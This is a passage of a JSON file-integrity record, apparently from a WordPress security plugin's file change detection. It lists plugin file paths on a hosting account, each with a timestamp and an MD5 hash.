,\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/validator.php\":{\"d\":1535620875,\"h\":\"3ef6b8075c1efc155b6820979854844b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/ipcheck\\/privacy.php\":{\"d\":1535620875,\"h\":\"498327f5e0b88adae91bcfdcf7ea933c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"d02798f24f3045f26b47b59d93a7cad3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/setup.php\":{\"d\":1535620875,\"h\":\"b0c71c8c49cf785fc0eef332f8b295a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/settings.php\":{\"d\":1535620875,\"h\":\"37c066611be957b5732e93a95ff9e8ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/settings-page.php\":{\"d\":1535620875,\"h\":\"8e57fab7f7c469a0331a8513e4d43636\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/active.php\":{\"d\":1535620875,\"h\":\"966862ce0baca8ed326b458df9dd810e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/validator.php\":{\"d\":1535620875,\"h\":\"3ea0484ab14fc82edb39af6cab38e76c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/global\\/privacy.php\":{\"d\":1535620875,\"h\":\"9fbba0bca3c9400810732301f7595fc9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/js\\/admin-four-oh-four.js\":{\"d\":1535620875,\"h\":\"45b5ac6b844b96ee18e5500a6dd80678\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/logs.php\":{\"d\":1535620875,\"h\":\"24f9e0aba3a246e651dbfb674adf90e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/setup.php\":{\"d\":1535620875,\"h\":\"3d5778b215bb103e09377c28e72c7d91\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/settings.php\":{\"d\":1535620875,\"h\":\"3664985c382f9e2ea41e85a4d8b36e6d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/settings-page.php\":{\"d\":1535620875,\"h\":\"fc72eeacd6e9c40bd6b007ac52b0ef2f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/active.php\":{\"d\":1535620875,\"h\":\"abec57c33b2e219578cc0b990f4d1294\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/validator.php\":{\"d\":1535620875,\"h\":\"d763a77f07ebff4bc777078997b9db38\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/404-detection\\/class-itsec-four-oh-four.php\":{\"d\":1535620875,\"h\":\"7fa094e9bb77b1415acac9a63fb7a3af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/js\\/admin-admin-user.js\":{\"d\":1535620875,\"h\":\"1fd96f3c6412b0b509c8f23d9634f1b5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/settings.php\":{\"d\":1535620875,\"h\":\"6fa14f0d7541ba8254214690a42ae52c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/settings-page.php\":{\"d\":1535620875,\"h\":\"70b64fb07c4283abbffb7fedce52a7e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/active.php\":{\"d\":1535620875,\"h\":\"ce407ff5715c837d02b1aba7975bf512\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/admin-user\\/validator.php\":{\"d\":1535620875,\"h\":\"5dcbd5612783ad7a1842885b5fd3e3fb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/js\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/js\\/settings-page.js\":{\"d\":1535620875,\"h\":\"188412a2f6da8c1912777dc0c3f2c89f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/css\\/settings-page.css\":{\"d\":1535620875,\"h\":\"5ee63d718c707314201f24dd3924caf1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/css\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/settings.php\":{\"d\":1535620875,\"h\":\"7656ba7397a35cd56252590bb93e3807\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/settings-page.php\":{\"d\":1535620875,\"h\":\"3de544c871505eefca52a2df5fcfefd7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/active.php\":{\"d\":1535620875,\"h\":\"c8a56cc30384349e3e75f10f4090123b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/class-itsec-password-requirements.php\":{\"d\":1535620875,\"h\":\"26eb7115700601e3bb209fba8e1fa18e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/password-requirements\\/validator.php\":{\"d\":1535620875,\"h\":\"1d86cf643f6e925c4d20eabbbcd0c3bd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/img\\/mail\\/index.php\":{\"d\":1535620875,\"h\":\"03efe17b1c4a21753f7d07ee17e77395\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/img\\/index.php\":{\"d\":1535620875,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-get-lockouts.php\":{\"d\":1535620875,\"h\":\"5338b20f3338d8245020bd76013c6d1b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-get-everything.php\":{\"d\":1535620875,\"h\":\"986516639d7832316d83d68fa2f87c7e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-get-temp-whitelist.php\":{\"d\":1535620875,\"h\":\"6aabe862828195d0629f2d6b8ef29a7a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-set-temp-whitelist.php\":{\"d\":1535620875,\"h\":\"86cf66359e581ae33fa2a9c37c4bf2ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sync-verbs\\/itsec-release-lockout.php\":{\"d\":1535620875,\"h\":\"03fd56ca21de1508a02f926543ea8b4a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/includes\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/includes\\/function.login-header.php\":{\"d\":1535620875,\"h\":\"bf17fbb4dc1c4abbd807de2120d237da\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/section-heading-with-icon.html\":{\"d\":1535620875,\"h\":\"80d3d98406c4fff418c5147dea22b04c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/large-code.html\":{\"d\":1535620875,\"h\":\"f99de5743ed24f094e1b54a74d309438\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/module-button.html\":{\"d\":1535620875,\"h\":\"3da7972b860899d4c6dcc9a3e52bff1d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/list.html\":{\"d\":1535620875,\"h\":\"3a621b53ec5956bac5e518b9e9fb4de3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/table.html\":{\"d\":1535620875,\"h\":\"a81d47902ec8c7982fc178727af9baa4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/file-change-summary.html\":{\"d\":1535620875,\"h\":\"973c46f5a32d1506177604ed6802e03d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/footer.html\":{\"d\":1535620875,\"h\":\"bf9e6a100a0e888c52ebbc96c1c650e5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/large-text.html\":{\"d\":1535620875,\"h\":\"971e88ee5b5f32b26b54591b9f819373\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/header.html\":{\"d\":1535620875,\"h\":\"361ad0317c10b4b5e76f0de1642893ee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/lockouts-table.html\":{\"d\":1535620875,\"h\":\"c85227219128a839dd1d56f12bdb7aa3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/section-heading.html\":{\"d\":1535620875,\"h\":\"de5e87c6edcc301169a54ae0ce8e724a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/info-box.html\":{\"d\":1535620875,\"h\":\"562b8d7d6c93aa2d334da71aa258e30d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/text.html\":{\"d\":1535620875,\"h\":\"689213ddb85cc67292bf97407d13e0db\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/close.html\":{\"d\":1535620875,\"h\":\"664abb40efe969897f70e2d10947a03d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/details-box.html\":{\"d\":1535620875,\"h\":\"c58288b0f79eed865b00c4477fa5f25d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/divider.html\":{\"d\":1535620875,\"h\":\"69fea9f654e704de91c739e154a643f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/footer-user.html\":{\"d\":1535620875,\"h\":\"9dc72e05baef3928e93efd6f0fb1bc1b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/lockouts-summary.html\":{\"d\":1535620875,\"h\":\"cef7690c7e740d1734a9fb5a146e0ce2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/pro-callout.html\":{\"d\":1535620875,\"h\":\"8ab2acdc1f52e5279663f0d6e1fb3a27\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/mail-templates\\/lockouts-entry.html\":{\"d\":1535620875,\"h\":\"81f35669878e14712e0652cf90d8c8aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/repeat.php\":{\"d\":1535620875,\"h\":\"3636f4fae786dadbe04978747bec1d62\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/regex.php\":{\"d\":1535620875,\"h\":\"76c62680768549048c6547dac48baf27\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-male_names.json\":{\"d\":1535620875,\"h\":\"eb51073fa15d848c2baec964c1018783\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/sequence.php\":{\"d\":1535620875,\"h\":\"fe4372758f485830201f90555da65a26\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/bruteforce.php\":{\"d\":1535620875,\"h\":\"8392275eab9b12ee882735d31b87742f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/dictionary-reverse.php\":{\"d\":1535620875,\"h\":\"d9d71e3fbb263c05acb8ec15288cba70\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/adjacency_graphs.json\":{\"d\":1535620875,\"h\":\"8356304eeac40cad828d60541d6db56d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/dictionary-l33t.php\":{\"d\":1535620875,\"h\":\"cc1528101249e33ae18939affd99c927\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-passwords.json\":{\"d\":1535620875,\"h\":\"33489e40438216c322e39d5a94dbcf8f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-surnames.json\":{\"d\":1535620875,\"h\":\"1969159e260d1803c60221435efefab3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/date.php\":{\"d\":1535620875,\"h\":\"d6a64fa98e47b4de2e2b1daf403ffab7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/dictionary.php\":{\"d\":1535620875,\"h\":\"c3bf1ed7775f3cf139d0fcad1938b116\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-female_names.json\":{\"d\":1535620875,\"h\":\"02e3637d6b2ae4d274b04143f848f7ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-us_tv_and_film.json\":{\"d\":1535620875,\"h\":\"5bd1dedf66e3c399e34fcde3c84d9a15\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/spatial.php\":{\"d\":1535620875,\"h\":\"4d8742098890a1eb01fa11725e7b8447\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matchers\\/ranked_frequency_list-english_wikipedia.json\":{\"d\":1535620875,\"h\":\"42fa73aa92a406b9efbf592670b82e68\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/results.php\":{\"d\":1535620875,\"h\":\"e6c561d67a5014d00c29bceb19be0865\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/scorer.php\":{\"d\":1535620875,\"h\":\"fff34c2fa72523baa0726e43f9f4aa33\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/matcher.php\":{\"d\":1535620875,\"h\":\"84af90d45b02b4aebb56b6daa5365005\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/readme.md\":{\"d\":1535620875,\"h\":\"9665a459a076a1053789f9e1afd972ee\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/itsec-zxcvbn-php\\/zxcvbn.php\":{\"d\":1535620875,\"h\":\"aec159ed25a823e204be65376cb3c120\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-scheduler-page-load.php\":{\"d\":1535620875,\"h\":\"07f02e43303a84ecbf0551dc11141b21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-user-activity.php\":{\"d\":1535620875,\"h\":\"b0c9412c752b4ece86343f3149d90cca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-file.php\":{\"d\":1535620875,\"h\":\"502553cd21d428777122d34a251f27d0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-distributed-storage.php\":{\"d\":1535620875,\"h\":\"f8ecf1defada512db0c922982c988cf4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-config-file.php\":{\"d\":1535620875,\"h\":\"c9791ef06ea9fd86fd4053980f80a060\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-scheduler.php\":{\"d\":1535620875,\"h\":\"ff28d44de76b6bebc100f0a8e71a80eb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-job.php\":{\"d\":1535620875,\"h\":\"f9f6d9cc22a0f29e72c60dbcd3245eba\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/settings.php\":{\"d\":1535620875,\"h\":\"bc137debec6b5179af513d1c6e52ddf7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/form.php\":{\"d\":1535620875,\"h\":\"80d2b0fe0906d542697c33f4a4b40e3f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/lock.php\":{\"d\":1535620875,\"h\":\"0efe94505ef28ef3c4d7b85b8f8f4f5f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-utility.php\":{\"d\":1535620875,\"h\":\"0ae61a3be6505507ded294f05fc376af\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/debug.php\":{\"d\":1535620875,\"h\":\"b56abf9c1132bc142816647a813c82a2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-password-requirements.php\":{\"d\":1535620875,\"h\":\"0e318075ffd07234cf2bef45ae043741\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/log.php\":{\"d\":1535620875,\"h\":\"5e948cdde53c0e4aa40be3db9071404d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-directory.php\":{\"d\":1535620875,\"h\":\"52df1df83e235d7c0ccc247684738f23\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/validator.php\":{\"d\":1535620875,\"h\":\"db68cdcbefde9acc233edc7e7190ae49\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-mail.php\":{\"d\":1535620875,\"h\":\"de7d6ae81019ee6fa492f075ce451f42\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/storage.php\":{\"d\":1535620875,\"h\":\"28c03ab301135150e1cf3f7724478521\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-scheduler-cron.php\":{\"d\":1535620875,\"h\":\"68e6cf400d06f71c0299228fea4fc6a6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/log-util.php\":{\"d\":1535620875,\"h\":\"56610fde72c02ece9ebada3b99f2ba14\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-login-interstitial.php\":{\"d\":1535620875,\"h\":\"e90b86278eb386d5a98983e1a4e53738\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-wp-list-table.php\":{\"d\":1535620875,\"h\":\"be5084a368b1958f22bec1f8344e6515\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-ip-tools.php\":{\"d\":1535620875,\"h\":\"063d67ff83ad8fef9fd338a2ee6b470a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/class-itsec-lib-canonical-roles.php\":{\"d\":1535620875,\"h\":\"c24a098a2e9417219efc30564b9efb96\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib\\/schema.php\":{\"d\":1535620875,\"h\":\"7f43581c98c6489ce1f8ac94f68b3752\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/css\\/ithemes.css\":{\"d\":1535620875,\"h\":\"bd8a02949ed7e6720d7632381e197c7f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/css\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/css\\/itsec_notice.css\":{\"d\":1535620875,\"h\":\"947a391c9eef4d20abc01677e5e7ac0a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/notify.php\":{\"d\":1535620875,\"h\":\"f3b557193f7e42f23f3c786037f58299\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/modules.php\":{\"d\":1535620875,\"h\":\"326f129957c988d3bbbdb728de56bb91\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lib.php\":{\"d\":1535620875,\"h\":\"26fc688096c85632bede04866e2b443b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/response.php\":{\"d\":1535620875,\"h\":\"b357055baa4759aec447d121004f2129\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/setup.php\":{\"d\":1535620875,\"h\":\"48c540801df7ca0f8488ef408d0aff47\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/lockout.php\":{\"d\":1535620875,\"h\":\"86ef7f5be9a43b0586eba957d8748852\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sidebar-widget-temp-whitelist.php\":{\"d\":1535620875,\"h\":\"ab5807f5635e3b9c23cb57fffa2df07b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/history.txt\":{\"d\":1535620875,\"h\":\"b3323d229b067e28cbd1b181efeb5c4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/index.php\":{\"d\":1535620875,\"h\":\"a5eb3a234af13e4af877ef721778894b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/bet